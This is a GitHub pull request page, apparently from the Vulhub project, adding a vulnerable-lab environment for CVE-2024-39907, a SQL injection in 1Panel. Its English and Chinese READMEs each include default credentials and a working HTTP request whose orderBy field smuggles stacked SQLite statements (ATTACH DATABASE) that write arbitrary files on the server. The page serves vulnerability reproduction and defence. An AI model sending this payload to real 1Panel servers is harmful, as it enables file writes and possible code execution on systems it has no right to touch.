Skip to content

Add CVE-2024-39907: 1Panel SQL Injection Vulnerability #703

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
merged 7 commits into from
Sep 11, 2025
Merged

Add CVE-2024-39907: 1Panel SQL Injection Vulnerability #703

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
7 commits
Select commit Hold shift + click to select a range
c052ca2
CVE-2024-39907
Jun 18, 2025
f4f0cca
Add CVE-2024-39907
Jun 18, 2025
e836828
Add CVE-2024-39907
Jun 18, 2025
d3103ef
Add CVE-2024-39907
Jun 18, 2025
3434bdf
improve manual and compose config
phith0n Sep 11, 2025
6703e6a
change environments order
phith0n Sep 11, 2025
8551a79
update title
phith0n Sep 11, 2025
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Binary file added 1panel/CVE-2024-39907/1.png
View file
Open in desktop
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
61 changes: 61 additions & 0 deletions 1panel/CVE-2024-39907/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,61 @@
# 1Panel Control Panel PostAuth SQL Injection (CVE-2024-39907)

[中文版本(Chinese version)](README.zh-cn.md)

1Panel is a web-based Linux server management control panel that provides a graphical interface for server administration.

CVE-2024-39907 is a collection of multiple SQL injection vulnerabilities present in the 1Panel control panel. These vulnerabilities exist across several interfaces of 1Panel, where insufficient filtering could allow attackers to achieve arbitrary file writes and ultimately remote code execution (RCE). This vulnerability affects 1Panel versions v1.10.9-lts and earlier, and has been patched in v1.10.12-lts.

References:

- <https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-39907.yaml>
- <https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6>
- <https://hub.docker.com/r/moelin/1panel>

## Environment Setup

Execute the following command to start a vulnerable instance of 1Panel v1.10.10-lts:

```
docker compose up -d
```

After the server starts, access `http://your-ip:10086/entrance` using the following default credentials:

- Port: `10086`
- Username: `1panel`
- Password: `1panel_password`
- Entrance path: `entrance`

## Vulnerability Reproduction

After logging into the 1Panel control panel with the default credentials, the vulnerability exists in the `/api/v1/hosts/command/search` endpoint where the `orderBy` parameter lacks proper input validation, allowing SQL injection attacks.

Send the following malicious POST request to exploit the vulnerability:

```
POST /api/v1/hosts/command/search HTTP/1.1
Host: your-ip:10086
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Cookie: psession=your-session-cookie
Connection: close
Content-Type: application/json
Content-Length: 83

{
"page":1,
"pageSize":10,
"groupID":0,
"orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
"order":"ascending",
"name":"a"
}
```

The malicious payload in the `orderBy` parameter exploits SQLite's ATTACH DATABASE functionality to create arbitrary files on the server filesystem, demonstrating successful SQL injection. When processed, the 1Panel backend executes the injected SQL commands without validation, confirming the vulnerability exists and can be exploited.

![1](1.png)

The successful execution of these database manipulation commands confirms that the SQL injection vulnerability can be exploited to achieve potential remote code execution.
59 changes: 59 additions & 0 deletions 1panel/CVE-2024-39907/README.zh-cn.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
# 1Panel控制面板SQL注入漏洞 (CVE-2024-39907)

1Panel是一款基于Web的Linux服务器管理控制面板,提供服务器管理的图形化界面。

CVE-2024-39907是1Panel控制面板中存在的多个SQL注入漏洞集合,这些漏洞存在于1Panel的多个接口中,部分注入点由于过滤不善,可能导致攻击者实现任意文件写入,最终达成远程命令执行(RCE)。该漏洞影响1Panel v1.10.9-lts及更早版本,已在v1.10.12-lts版本中得到修复。

References:

- <https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-39907.yaml>
- <https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6>
- <https://hub.docker.com/r/moelin/1panel>

## 环境搭建

执行如下命令启动一个有漏洞的1Panel v1.10.10-lts:

```
docker compose up -d
```

环境启动后,访问`http://your-ip:10086/entrance`,使用以下默认凭据登录:

- 端口:`10086`
- 用户名:`1panel`
- 密码:`1panel_password`
- 入口路径:`entrance`

## 漏洞复现

登录1Panel控制面板后,漏洞存在于`/api/v1/hosts/command/search`接口中,`orderBy`参数缺乏适当的输入验证,导致SQL注入攻击。

发送以下恶意POST请求来利用该漏洞:

```
POST /api/v1/hosts/command/search HTTP/1.1
Host: your-ip:10086
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Cookie: psession=your-session-cookie
Connection: close
Content-Type: application/json
Content-Length: 83

{
"page":1,
"pageSize":10,
"groupID":0,
"orderBy":"3;ATTACH DATABASE '/tmp/randstr.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;",
"order":"ascending",
"name":"a"
}
```

`orderBy`参数中的恶意负载利用SQLite的ATTACH DATABASE功能在服务器文件系统上创建任意文件,演示了成功的SQL注入攻击。处理请求时,1Panel后端会执行注入的SQL命令而不进行验证,确认漏洞存在且可被利用。

![1](1.png)

这些数据库操作命令的成功执行证明SQL注入漏洞可以被利用来实现潜在的远程代码执行。
7 changes: 7 additions & 0 deletions 1panel/CVE-2024-39907/docker-compose.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
services:
1panel:
image: vulhub/1panel:1.10.10
ports:
- "10086:10086"
environment:
- TZ=Asia/Shanghai # 时区设置
3 changes: 3 additions & 0 deletions base/1panel/1.10.10/Dockerfile
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,3 @@
FROM moelin/1panel:v1.10.10-lts

LABEL maintainer="wjch611 <[email protected]>"
22 changes: 14 additions & 8 deletions environments.toml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -7,6 +7,12 @@ tags = [
"Other",
]

[[environment]]
name = "1Panel Control Panel PostAuth SQL Injection"
cve = ["CVE-2024-39907"]
app = "1panel"
path = "1panel/CVE-2024-39907"
tags = ["SQL Injection"]

[[environment]]
name = "Apache ActiveMQ Deserialization"
Expand Down Expand Up @@ -50,13 +56,6 @@ app = "Adminer"
path = "adminer/CVE-2021-43008"
tags = ["Path Traversal"]

[[environment]]
name = "aiohttp Directory Traversal Vulnerability"
cve = ["CVE-2024-23334"]
app = "Python"
path = "python/CVE-2024-23334"
tags = ["Path Traversal"]

[[environment]]
name = "Apache Airflow Command Injection"
cve = ["CVE-2020-11978"]
Expand Down Expand Up @@ -1443,6 +1442,13 @@ app = "PostgreSQL"
path = "postgres/CVE-2019-9193"
tags = ["RCE", "Database"]

[[environment]]
name = "aiohttp Directory Traversal Vulnerability"
cve = ["CVE-2024-23334"]
app = "Python"
path = "python/CVE-2024-23334"
tags = ["Path Traversal"]

[[environment]]
name = "Python PIL/Pillow Remote Command Execution by GhostScript GhostButt"
cve = ["CVE-2017-8291"]
Expand Down Expand Up @@ -2106,4 +2112,4 @@ name = "Zabbix Server Active Proxy Trapper Command Injection Bypass"
cve = ["CVE-2020-11800"]
app = "Zabbix"
path = "zabbix/CVE-2020-11800"
tags = ["RCE"]
tags = ["RCE"]